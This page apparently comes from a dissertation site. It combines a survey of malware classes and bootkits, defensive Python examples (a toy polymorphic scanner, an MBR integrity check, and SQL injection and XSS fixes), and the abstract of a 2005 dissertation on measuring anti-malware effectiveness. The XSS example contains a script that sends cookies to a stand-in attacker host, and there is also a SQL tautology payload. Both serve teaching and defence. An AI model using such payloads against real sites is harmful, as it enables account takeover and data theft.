In addition to delivering advertisements, many advertising programs also collect confidential information about the computer and the user (IP address, OS and Internet browser version, list of the most frequently used Internet resources, search queries and other information that can be used for advertising purposes).

For this reason, Adware programs are often also called Spyware (adware in the Spyware category should not be confused with Trojan-Spy spyware). Programs in the Adware category cause harm associated not only with the loss of time and distraction of the user from work, but also with the very real threat of leaking confidential data.

The distribution of programs of the RiskWare and PornWare classes by behavior can be presented in the form of a pie chart (Fig. 4.2, according to Kaspersky Lab).

AdTool covers various advertising modules that cannot be classed as AdWare, because they have the necessary legal attributes: they come with a license agreement, show their presence on the computer, and inform the user about their actions.


Fig. 4.2.

Porn-Dialers independently (without notifying the user) make telephone connections to premium numbers, which often leads to litigation between subscribers and their telephone companies.

The Monitor category covers legal keyloggers (programs that record keystrokes), which are officially produced and sold; if, however, they can hide their presence in the system, such programs can serve as full-fledged spyware Trojans.

Programs in the PSW-Tool category are designed to recover forgotten passwords, but can easily be used by criminals to extract these passwords from the computer memory of an unsuspecting victim. Programs in the Downloader category can be used by criminals to download malicious content onto a victim computer.

Other malware includes a variety of programs that do not directly pose a threat to the computer on which they are executed, but are designed to create other malicious programs, organize DDoS attacks on remote servers, hack other computers, etc.

Such programs include virus hoaxes (Hoax) and fake antivirus programs (FraudTool), tools for attacking remote computers (Exploit, HackTool), constructors and packers of malicious programs (Constructor, VirTool, Packed), programs for sending spam and for flooding attacks (SpamTool, IM-Flooder, Flooder), and programs for misleading the user (BadJoke).

The main type of FraudTool is the so-called rogue antivirus: programs that pretend to be full-fledged antivirus tools. Once installed, they invariably "find" some virus, even on a completely clean system, and offer to sell their paid version for "treatment". Besides directly deceiving users, these programs also carry an AdWare function. In effect this is plain fraud that trades on users' fear of malware.

Hacker utilities of the Exploit and HackTool categories are designed to penetrate remote computers in order to control them further (using backdoor Trojans) or to introduce other malicious programs into the compromised system. Utilities of the Exploit type take advantage of vulnerabilities in the operating system or in applications installed on the attacked computer.

Virus and Trojan constructors are utilities designed to create new computer viruses and Trojan horses. Constructors for DOS, Windows and macro viruses are known. They can generate virus source code, object modules and/or directly infected files.

Some constructors come with a standard graphical interface in which a menu system lets the user choose the type of virus, the objects to be infected, the presence or absence of encryption, anti-debugging measures, internal text strings, effects accompanying the virus's operation, and so on. Other constructors have no interface and read the description of the virus to be created from a configuration file.

Utilities of the Nuker category send specially crafted requests to attacked computers on the network, as a result of which the attacked system stops working. These programs exploit vulnerabilities in network-service software and operating systems: a specially formed network request triggers a critical error in the attacked application.

The Bad-Joke and Hoax categories comprise programs that cause no direct harm to the computer but display messages claiming that such harm has already been done, or will be done under certain conditions, or warn the user about a non-existent danger. "Evil jokes" include, for example, programs that tell the user the hard drive is being formatted (although no formatting takes place), "detect" viruses in uninfected files, or display strange virus-like messages.

Polymorphic generators are not viruses in the literal sense of the word, since their algorithm does not include reproduction functions. The main function of this kind of program is to encrypt the body of the virus and generate a corresponding decryptor.

Typically, polymorphic generators are distributed by their authors without restrictions in the form of an archive file. The main file in the archive of any generator is the object module containing this generator.
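
To make the point about polymorphic generators concrete, here is an added toy model (example code written for this page, not a real generator and not code from any project the page mentions). The "virus body" is an inert byte string, the "decryptor" is a small data record rather than machine code, and the emulator that interprets it stands in for the emulation a behaviour-based scanner performs; the body, the signature bytes and the two decryptor forms are all constructed for the example.

```python
"""Added toy model of a polymorphic layer; inert data only, not a real generator."""
import hashlib
import os
from typing import Optional

# Constructed, inert stand-in for a constant virus body, and the fixed byte
# sequence a signature scanner would carry for it.
BODY = b"INERT-BODY-BYTES-0123456789-INERT-BODY-BYTES"
SIGNATURE = b"BODY-BYTES-0123"


def generate_instance(body: bytes, key: Optional[bytes] = None) -> dict:
    """Polymorphic generator: a fresh 4-byte key and one of two decryptor
    shapes per call, so the same body gets a different byte image each time."""
    key = key if key is not None else os.urandom(4)
    if len(key) != 4:
        raise ValueError("key must be 4 bytes")
    # Two interchangeable decryptor forms (XOR or byte-wise ADD of the key);
    # the choice depends on the key, so neither the decryptor nor the body
    # image is constant across instances.
    op = "xor" if key[0] & 1 else "add"
    if op == "xor":
        image = bytes(b ^ key[i % 4] for i, b in enumerate(body))
    else:
        image = bytes((b + key[i % 4]) & 0xFF for i, b in enumerate(body))
    return {"decryptor": {"op": op, "key": key}, "ciphertext": image}


def emulate_decryptor(instance: dict) -> bytes:
    """Minimal emulator: interpret the decryptor record to recover the body,
    which is what an emulation-based scanner does before re-scanning."""
    op, key = instance["decryptor"]["op"], instance["decryptor"]["key"]
    ct = instance["ciphertext"]
    if op == "xor":
        return bytes(b ^ key[i % 4] for i, b in enumerate(ct))
    return bytes((b - key[i % 4]) & 0xFF for i, b in enumerate(ct))


def signature_scan(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """Plain signature scanner: a fixed byte sequence either occurs or not."""
    return signature in data


def scan_with_emulation(instance: dict, signature: bytes = SIGNATURE) -> bool:
    """Emulate the decryptor first, then apply the same signature."""
    return signature_scan(emulate_decryptor(instance), signature)


def image_hash(instance: dict) -> str:
    """SHA-256 of the on-disk image (decryptor record + encrypted body)."""
    d = instance["decryptor"]
    return hashlib.sha256(d["op"].encode() + d["key"] + instance["ciphertext"]).hexdigest()


if __name__ == "__main__":
    a, b = generate_instance(BODY), generate_instance(BODY)
    print("two instances differ on disk:", image_hash(a) != image_hash(b))
    print("signature found in raw image:", signature_scan(a["ciphertext"]))
    print("signature found after emulation:", scan_with_emulation(a))
```

Every call to generate_instance yields a different byte image of the same body, so a signature taken from the body is absent from the image, while scan_with_emulation recovers the constant body first and the signature matches again. Real generators emit executable decryptor code with junk instructions and register reassignment, which the two fixed operations here do not model.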

The evolution of malware from single modules to complex, interacting projects began at the start of this century. This new model of malware operation is expected not only to become the standard for a mass of new malicious projects but also to develop further.

The main features of this model are the following:

  • lack of a single control center for a network of infected computers;
  • active counteraction to attempts by third-party research and interception of control;
  • simultaneous mass and short-term distribution of malicious code;
  • competent use of social engineering tools;
  • using different distribution methods and phasing out the most visible ones (email);
  • using different modules to implement different functions (rather than one universal one).

By analogy with the well-known term Web 2.0, the new generation of malware can be called MalWare 2.0.

The technique of hiding presence in a system (rootkits) is coming to be used not only in Trojan programs but also in file viruses, a return to the MS-DOS era when resident stealth viruses existed. This is a logical development of methods for countering antivirus programs: malicious programs now tend to "survive" on a system even after being detected.

Another dangerous way of hiding a program's presence on a computer is infecting the boot sector of the disk, the so-called "bootkit". This, too, is the return of an old technique, and it lets the malicious program gain control before the main part of the operating system (and the antivirus program) loads. Bootkits are rootkits that load from the boot sectors of a device; their danger lies in the fact that the malicious code gains control before the OS, and therefore before the antivirus program, starts.

One of the most striking examples of bootkit technology is vbootkit. A simplified sequence of its actions is as follows. After the computer is powered on and the BIOS has run, the vbootkit code (from a CD or another device) is activated. The boot program from the MBR and the Windows Vista boot loader are then executed, after which control is transferred to the kernel of that operating system.

Once vbootkit has gained control, it hooks the BIOS INT 13h (disk services) interrupt and searches the sectors read through it for signatures of the Windows Vista boot components. Once these are found, it begins modifying them on the fly while hiding itself (placing its code in small chunks in different areas of RAM). The modifications include bypassing security measures such as digital-signature and hash verification of the boot components, and taking steps to keep control of the system during both the first and the second phase of the boot process.

The second stage patches the operating-system kernel so that vbootkit retains control until the next reboot. The user is thus left with vbootkit loaded into the Windows Vista kernel.

Bootkits keep in the boot sector only the minimum needed to load the main code. That main code is stored in other sectors, whose contents the bootkit hides by intercepting the BIOS sector-read interrupt.
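
As an added example (not from the original page), the following Python parses a 512-byte MBR image and applies the integrity-control idea to the bootstrap area: hash the 446 bytes of boot code once, keep the digest as a baseline, and alarm when it changes. The MBR image, the baseline and the "infected" variant are constructed inline; the device paths mentioned in the comments are the usual ones and are not taken from the page.

```python
"""Added example: parse a 512-byte MBR and check its bootstrap code
against a stored baseline digest.  The images here are constructed; in
practice the sector is the first 512 bytes read raw from the disk device
(/dev/sda on Linux, \\.\PhysicalDrive0 on Windows), taken from a trusted
boot medium rather than from the possibly infected running system."""
import hashlib
import struct

MBR_SIZE = 512
BOOTCODE_LEN = 446             # bytes 0..445: bootstrap code
PART_TABLE_OFF = 446           # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510..511


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR image into bootstrap code, partition entries and signature."""
    if len(sector) != MBR_SIZE:
        raise ValueError(f"expected {MBR_SIZE} bytes, got {len(sector)}")
    partitions = []
    for i in range(4):
        # entry layout: status(1) CHS-start(3) type(1) CHS-end(3)
        #               LBA-start(4) sector-count(4), little-endian
        status, ptype, lba_start, sectors = struct.unpack_from(
            "<B3xB3xII", sector, PART_TABLE_OFF + 16 * i)
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {"bootcode": sector[:BOOTCODE_LEN], "partitions": partitions,
            "signature_ok": sector[510:512] == BOOT_SIGNATURE}


def bootcode_digest(sector: bytes) -> str:
    """SHA-256 over the bootstrap area only, so a legitimate repartitioning
    (which rewrites bytes 446..509) does not change the baseline."""
    return hashlib.sha256(sector[:BOOTCODE_LEN]).hexdigest()


def check_mbr(sector: bytes, baseline_digest: str) -> list:
    """Integrity-control check; returns the list of findings (empty = clean)."""
    findings = []
    info = parse_mbr(sector)
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if bootcode_digest(sector) != baseline_digest:
        findings.append("bootstrap code differs from baseline")
    if sum(p["bootable"] for p in info["partitions"]) > 1:
        findings.append("more than one partition flagged bootable")
    return findings


def build_sample_mbr(bootcode: bytes) -> bytes:
    """Constructed MBR: the given bootstrap bytes, one bootable NTFS-type
    partition starting at LBA 2048, three empty entries, boot signature."""
    code = bootcode.ljust(BOOTCODE_LEN, b"\x00")[:BOOTCODE_LEN]
    table = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 1_000_000) + b"\x00" * 48
    return code + table + BOOT_SIGNATURE


# Constructed images.  The clean bootstrap starts with the usual x86 prologue
# (cli; xor ax,ax; mov ss,ax; mov sp,0x7c00); the 'infected' variant has its
# first bytes replaced by a short jump, standing in for a loader stub that
# diverts execution to code parked in other sectors.  Not a real bootkit.
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 32)
INFECTED_MBR = b"\xeb\x3c\x90\x90" + CLEAN_MBR[4:]
BASELINE = bootcode_digest(CLEAN_MBR)

if __name__ == "__main__":
    print("clean:", check_mbr(CLEAN_MBR, BASELINE) or "no findings")
    print("infected:", check_mbr(INFECTED_MBR, BASELINE))
```

The check is only meaningful when the sector is read through a path the bootkit does not control: a resident bootkit that hooks the BIOS sector-read service hands the clean sector back to anything that reads through it, so the comparison belongs on a trusted boot medium or on the disk attached to another machine. The partition table is parsed but deliberately left out of the digest, so that repartitioning does not trip the bootstrap-code alarm.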

Users of social networks are becoming the main target of so-called phishing. Credentials of subscribers to various network services are in high demand among attackers. This is an important alternative to placing malware on compromised Web sites: Trojan programs can be distributed through the accounts of social-network users, via their blogs and profiles.

Another problem related to social networks is XSS, PHP and SQL attacks (cross-site scripting, injection into PHP scripts, SQL injection). Unlike phishing, which relies solely on deception and social engineering, these attacks exploit bugs and vulnerabilities in the Web 2.0 services themselves and can affect even highly literate users. Here the attackers' target is users' personal data, which is needed to build databases and lists for subsequent attacks by "traditional" methods.
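
To show the distinction the text draws between deception-based phishing and attacks on the service's own code, here is an added example (not from the original page): a profile lookup and a search-results page written in Python with sqlite3 as a stand-in for a PHP/SQL back end, each in its vulnerable form beside its hardened form. The table contents, the tautology payload and the script payload are constructed for the example.

```python
"""Added example: SQL injection and reflected XSS, vulnerable vs hardened."""
import html
import sqlite3

# Constructed sample data standing in for a social-network profile table.
_CONN = sqlite3.connect(":memory:")
_CONN.execute("CREATE TABLE profile (username TEXT, email TEXT, phone TEXT)")
_CONN.executemany("INSERT INTO profile VALUES (?, ?, ?)", [
    ("alice", "alice@example.com", "+1-555-0100"),
    ("bob",   "bob@example.com",   "+1-555-0101"),
    ("carol", "carol@example.com", "+1-555-0102"),
])


def lookup_vulnerable(username: str) -> list:
    """Vulnerable: the request parameter is pasted into the SQL text, so the
    attacker's input becomes part of the query grammar."""
    sql = f"SELECT username, email, phone FROM profile WHERE username = '{username}'"
    return _CONN.execute(sql).fetchall()


def lookup_hardened(username: str) -> list:
    """Hardened: the value travels as a bound parameter and is only ever
    compared as data, whatever characters it contains."""
    sql = "SELECT username, email, phone FROM profile WHERE username = ?"
    return _CONN.execute(sql, (username,)).fetchall()


def render_vulnerable(query: str) -> str:
    """Vulnerable reflected output: the search string goes into the HTML raw."""
    return f"<p>Results for: {query}</p>"


def render_hardened(query: str) -> str:
    """Escaped output: markup characters become entities, so the browser
    shows the string instead of executing it."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# Constructed payloads: a classic tautology, and a cookie-stealing script
# pointed at a reserved, non-resolving hostname.
INJECTION = "x' OR '1'='1"
XSS = '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(len(lookup_vulnerable(INJECTION)), "rows leaked by the vulnerable query")
    print(len(lookup_hardened(INJECTION)), "rows from the hardened query")
    print(render_vulnerable(XSS))
    print(render_hardened(XSS))
```

The injected string turns the vulnerable query into one whose WHERE clause is always true, dumping every profile row; the parameterised form matches no user. Likewise the raw reflection hands the browser a script that ships its cookies off-site, while the escaped form renders the same string as inert text.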

The main factors ensuring the simultaneous interest of users and hackers in Web 2.0 services are:

  • transfer of user data from a personal computer to the Internet;
  • using one account for several different services;
  • availability of detailed information about users;
  • availability of information about connections, contacts and acquaintances of users;
  • providing a place for publication of any information;
  • trusting relationships between contacts.

This problem is already quite serious and, according to experts, has every chance of becoming a major information security problem.

As for mobile devices, and primarily mobile phones, threats to them are distributed between primitive Trojan programs and various vulnerabilities in operating systems and applications for smartphones.

According to the way software implants (planted malicious code) are introduced into a computer system and where they can reside in it, implants can be divided into the following groups:

  • implants associated with the BIOS;
  • implants associated with the boot sector and the operating-system loader;
  • implants associated with operating-system drivers and other system modules;
  • implants associated with general-purpose application software (for example, archivers);
  • program files that contain only the implant code and are implemented as batch files;
  • implants masquerading as general-purpose application software;
  • implants disguised as gaming or educational software (to ease their initial introduction into the computer system).

Chapter 1. FEATURES OF COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE

1.1. Malicious programs as a source of threats to critical segments of the information sphere.

1.2. Counteracting malware in critical segments of the information sphere.

1.3. Statement of the problem of a comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

1.4. Conclusions.

Chapter 2. FORMATION OF INDICATORS OF THE EFFECTIVENESS OF COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE

2.1. Methodology for structuring indicators of the effectiveness of countering malware.

2.2. Methodology for synthesizing the hierarchical structure of anti-malware effectiveness indicators.

2.3. A unified description of the structure of anti-malware effectiveness indicators.

2.4. Conclusions.

Chapter 3. MATHEMATICAL MODELING OF PROCESSES FOR COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE

3.1. Features of the synthesis of a mathematical model for assessing the effectiveness of countering malware.

3.2. Formal representation of the processes of functioning of anti-malware tools.

3.3. Simulation model for assessing the temporal effectiveness of countering malware.

3.4. Analytical models for assessing probabilistic indicators of the effectiveness of countering malware.

3.5. Presentation of initial data for assessing probabilistic indicators of the effectiveness of countering malware.

3.6. Conclusions.

Chapter 4. COMPUTATIONAL EXPERIMENTS TO ASSESS THE EFFECTIVENESS OF COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE

4.1. Methodology for planning computational experiments to assess the effectiveness of countering malware.

4.2. Results of computational experiments.

4.3. Analysis of the effectiveness of the proposed method for assessing counteraction to malware.

4.4. Conclusions.


Introduction to the dissertation (part of the abstract) on the topic "Development and research of algorithms for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere"

Relevance of the research topic. The intensive development and improvement of information technologies makes it necessary to regard the expansion of the information sphere as a dominant trend. This has led to the emergence of a separate class of elements of that sphere, its so-called critical segments: information systems supporting the activities of government bodies /1/, communication infrastructure management systems /2/, finance /3/, energy /4/, transport /5/ and emergency services /6/. At the same time, the expansion of the information sphere has given rise to various types of threats to its elements /7/, and its critical segments have become the main object of such threats. This has made it necessary to solve a number of problems related to organizing the protection of the information sphere so as to prevent damage from breaches of its security in the presence of various sources of threats /8 - 13/.

One of the most serious sources of threats in the information sphere is malware /14 - 16/, one of the main tools for illegal manipulation of information /17/ in its computer networks /18/. Malicious programs are built by highly qualified specialists /19/ as virus-type programs /20 - 26/, which lets them exploit such advantages of computer viruses as an isomorphic structure, the ability to create their own copies, and the ability to manifest themselves only under certain parameters of the computing environment /27 - 28/. These properties allow malicious programs to carry out illegal manipulation of information in extremely short periods of time, which greatly complicates detecting and eliminating them and, as a result, places such programs among the most advanced tools for illegal actions in the information sphere today /29/.

Malicious programs affect, first of all, the temporal characteristics of elements of the information sphere, since their impact results in significant time losses associated with restoring the correctness of information processes.

In this regard, it is obvious that malicious programs are a factor in a significant reduction in the efficiency of use of critical segments of the information sphere in particular, since the activity of these segments is focused on the rapid processing of incoming information. This, in turn, allows malware to be classed as a separate class of the most serious threats to the security of the information sphere.

Hence, the problem of protecting critical segments of the information sphere from this type of threat becomes urgent. It is obvious that its solution must be carried out systematically, based on a comprehensive study of anti-malware technologies. The fact that such technologies are characterized by many heterogeneous parameters makes their research issues complex, both scientifically and practically.

Such studies involve:

Conducting a system analysis of the state of protection against malware as a whole in the information sphere and its individual critical segments;

Research of effective methods and means of counteracting malware;

Assessment of anti-malware technologies in critical segments of the information sphere.

All this has necessitated the search for approaches to assessing the effectiveness of countering malware that would systematically take into account all the many properties of the technologies used.

As an analysis of the state of the issue /30/ shows, one of the most promising ways to solve this problem is to synthesize a complex indicator that characterizes the capabilities of the technologies used to counter malware. At the same time, the synthesis of a complex indicator has a number of features associated with the presence of many directions both in classifying the capabilities of various technologies to counter malware, and in the use of mathematical tools for research.

This made it possible to propose a fundamentally new approach to solving the problem of comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

The essence of this approach is to develop reasonable rules for the synthesis of a comprehensive indicator of the effectiveness of countering malware, the form of which will be optimal from the point of view of reflecting the capabilities of the counteraction technologies used.

Despite the fact that improving the theory and practice of ensuring information security has become an extremely pressing problem, special studies in relation to the tasks of a comprehensive assessment of the effectiveness of countering malicious programs in the information sphere in general and countering malicious programs in its critical segments, in particular, have not been carried out.

Since the proposed method for assessing the effectiveness of countering malware is not covered in the available literature, and the known methods do not allow a comprehensive assessment of the capabilities of anti-malware tools, there are grounds to assert that the task of developing methods for a comprehensive assessment of the effectiveness of these tools is extremely relevant, and that the issues in this area need serious study in both methodological and applied terms. All this indicates the relevance of the topic of this dissertation, carried out in accordance with the Information Security Doctrine of the Russian Federation /7/, as well as with the scientific direction of the Voronezh Institute of the Ministry of Internal Affairs of Russia related to substantiating requirements for information security means and systems.

The object of the research is technologies to counter malware in critical segments of the information sphere.

The subject of the research is methods for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

The goal of the dissertation work is to improve methods for assessing counteraction to malware in critical segments of the information sphere based on the synthesis of a comprehensive indicator of the effectiveness of the counteraction technologies used.

To achieve the goal, the following scientific tasks are solved:

Theoretical justification of system requirements for the synthesis of a comprehensive indicator of the effectiveness of countering malware in critical segments of the information sphere;

Development of an algorithm for the synthesis of such an indicator;

Construction of an optimal structure of particular indicators of the effectiveness of the anti-malware technologies used;

Development of a set of analytical and simulation models that provide assessment of the effectiveness indicators of the used anti-malware technologies;

Experimental testing of algorithms for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

Research methods. The work uses methods of system analysis, information security theory, set theory, graph theory, mathematical modeling, probability theory and mathematical statistics, and the theory of random processes.

The validity and reliability of the results obtained is ensured by:

The use of proven mathematical tools in the process of formalizing the processes of countering malware;

Experimental verification of the developed mathematical models and the correspondence of the results obtained to cases known from the scientific literature.

The scientific novelty and theoretical significance of the results obtained in the dissertation are as follows:

1. Algorithms have been developed for a comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere, which differ from known methods for solving similar problems in that the integration of particular indicators takes into account their influence on the objective function: the degree to which damage to the information sphere from a breach of its security is prevented.

2. A methodological approach to combining simulation and analytical modeling is proposed to evaluate particular indicators of anti-malware technologies, which, unlike analogues, makes it possible to control the level of detail of the processes under study.

3. New solutions have been proposed for constructing mathematical models of countering malware, based on the similarity of the particular indicators of the technologies used to the classical representation of random variables.

The practical value of the research lies in the development of an effective decision support system for assessing the technologies used to counter malware in critical segments of the information sphere, which performs the following functions:

Analysis and generalization of particular indicators of countering malware for various practical options for used counteraction technologies;

Construction of analysis schemes for anti-malware technologies that are convenient for practical understanding;

Comparison of effectiveness indicators of various anti-malware technologies.

The results of theoretical and experimental research can be used to solve the following scientific and applied problems:

Justification of new approaches to organizing counteraction to malware in critical segments of the information sphere;

Analysis of existing technologies to counter malware during their use.

The results obtained can be used in lecture courses and educational materials at higher educational institutions when studying the basics of information security, as well as in retraining personnel responsible for the security of critical segments of the information sphere.

The following main provisions of the dissertation work are submitted for defense:

1. Statement and results of solving the problem of synthesizing a comprehensive indicator of the effectiveness of counteracting malware in critical segments of the information sphere based on constructing an optimal structure of particular indicators, and its application to assess the effectiveness of the technologies used to counteract malware.

2. A methodological approach to combining simulation and analytical modeling to evaluate specific indicators of anti-malware technologies.

Implementation of work results. The results of the dissertation work are implemented in:

Military Institute of Radio Electronics of the Ministry of Defense of the Russian Federation;

Voronezh Institute of the Ministry of Internal Affairs of the Russian Federation;

Main Department of Internal Affairs of the Voronezh Region;

Department of Internal Affairs of the Tambov region.

The implementation of the results is confirmed by relevant acts.

Approbation of work. The main methodological and practical results of the research were presented at the following conferences:

1. All-Russian scientific and practical conference “Modern problems of fighting crime” - Voronezh, 2002 /48/.

2. Interregional scientific and practical conference “Information and Security” - Voronezh, 2002 /56/.

3. IV All-Russian Scientific and Practical Conference “Security, Security and Communications” - Voronezh, 2003 /49/.

4. All-Russian scientific and practical conference “Modern problems of fighting crime” - Voronezh, 2005 /57/.

In the works published in co-authorship, the applicant personally proposed: in /28/, to classify computer viruses taking into account their combined manifestation of the properties of associativity, replicativity and isomorphism; in /29/, an illustration of attackers' use of various properties of computer viruses when implementing the stages of a general strategy for unauthorized access to information in computer systems; in /30/, to consider activity and survivability as the main classifying characteristics of the properties of malicious programs; in /35/, a systematization of the circumstances that determine the need to keep the actions of law enforcement agencies secret; in /48/, to identify illegal actions in the field of computer information using a two-level system, the first level of which ensures identification of the fact of an illegal action, and the second, of the traces of such influences; in /49/, to identify facts of illegal influence on information in computer networks using semantic control of the information parameters of computing processes; in /50/, the principle of a hierarchical description of strategies for unauthorized access to information in computer systems as a fundamental principle for identifying computer crimes; in /53/, to use distributed information protection technologies as a source of forensically significant information in the investigation of computer crimes; in /54/, to consider the presence of a full set of identifying signs of this kind of illegal action as the dominant factor in increasing the detection rate of computer crimes; in /56/, to consider the methodology for assessing the security of information and telecommunication systems against threats to their information security as a procedure for forming a hierarchical structure of indicators, and to consider as an example of a functional information model the activity of the special forces regime service in providing employees with official documentation; in /57/, to form a comprehensive indicator for assessing the effectiveness of countering malware based on the hierarchical structuring of particular indicators; in /67/, to use a functional description of information processes as a necessary stage of their formalization.

Structure and scope of work. The dissertation is presented on 164 pages and consists of an introduction, four chapters, a conclusion, a bibliography of used literature and an appendix, contains 51 figures and 19 tables.

Specialty 05.13.19 (VAK code), "Methods and systems of information security, information security".

Conclusion of the dissertation on the topic “Methods and systems of information security, information security”, Sushkov, Pavel Feliksovich

4.4. Conclusions

1. It is advisable to assess the effectiveness of countering malware in critical segments of the information sphere based on an analysis of various options for using countermeasures in accordance with the plan of computational experiments.

2. The use of methods developed in the dissertation for assessing the effectiveness of countering malware in critical segments of the information sphere allows us to reduce the range of mathematical models used by 50%.

3. The accuracy characteristics of the hierarchical structure of indicators proposed in the dissertation, due to the use of a probability scale, are at least two orders of magnitude higher than the accuracy characteristics of known integrated indicator structures.

4. The method developed in the dissertation for assessing the effectiveness of counteracting malware in critical segments of the information sphere can be considered as a universal method for assessing the security of information objects.

[Fig. 4.3.2 is reproduced here only in outline, from the labels that survived extraction.]

Level 5 (goal): the purpose of information protection is to prevent damage from information security breaches.

Levels 4 to 2 (intermediate, top to bottom): capabilities for preventing violations of confidentiality (leakage), integrity and availability (blocking) of information; capabilities for protecting information from unauthorized access (NSD), from leakage via side electromagnetic radiation and interference (PEMIN channels) and, for speech information, via the acoustic channel; and, for each of these three threat classes, capabilities for preventing conditions favourable to threats, preventing the emergence of threats, detecting threat sources, neutralizing threats, detecting the impact of threats, and recovering information after their impact.

Level 1 (particular indicators): capabilities for restricting access to the information resources of the information and telecommunication system (ITKS); hiding informative radiation and interference (physical fields); disinformation (imitation of radiation and interference); cryptographic transformation of information; monitoring the state of elements of the information-processing hardware (TSOI) and ITKS; logging their functioning; timely destruction of spent and unused information; signalling manifestations of NSD threats and of leakage threats via PEMIN and acoustic channels; and localizing and responding to (neutralizing) those threats.

Fig. 4.3.2. Structure of indicators of heterogeneous technical systems and information security means of information and telecommunication systems

CONCLUSION

The main scientific results obtained in the dissertation work are as follows:

1. A method for the generalized assessment of the effectiveness of a system for countering malware in critical segments of the information sphere has been theoretically justified and practically implemented, based on structuring the particular indicators of countermeasures.

2. A method has been developed for optimizing the structure of particular indicators of countering malware. In accordance with it, it is proposed to:

- present the set of countermeasure indicators as a hierarchical structure with consistent generalization of the properties of the countermeasures;

- present the levels of the hierarchical structure as sets of indicators corresponding to the main classes of capabilities of countermeasures for ensuring the security of the computer networks that form the material basis of the information sphere;

- use, as the tool for studying the effectiveness of countering malware, simulation and analytical models that describe the functioning of the countermeasures.

3. A methodology has been developed for assessing different options for equipping computer networks with anti-virus tools, based on the principles of the theory of computational experiments and using the mathematical models developed in the dissertation.

The following new practical results were obtained in the dissertation:

1. Research carried out using the mathematical models developed for countering malware in critical segments of the information sphere gives grounds to assert that:

- the use of the methods developed in the dissertation for assessing the counteraction to malware in critical segments of the information sphere makes it possible to reduce the range of mathematical models used by 50%;

- the accuracy characteristics of the hierarchical structure of indicators proposed in the dissertation, owing to the use of a probability scale, are at least two orders of magnitude higher than those of known integrated indicator structures.

The practical significance of these results is that they make it possible to quantify the feasibility of carrying out measures to combat malware in critical segments of the information sphere.

2. Together, the developed methods, models and algorithms constitute methodological support for solving the practical problem of assessing the effectiveness of countering malware in critical segments of the information sphere. They can be used to solve similar problems when assessing the security of information objects against similar threats to their information security.

List of references for the dissertation research of Candidate of Technical Sciences Sushkov, Pavel Feliksovich, 2005

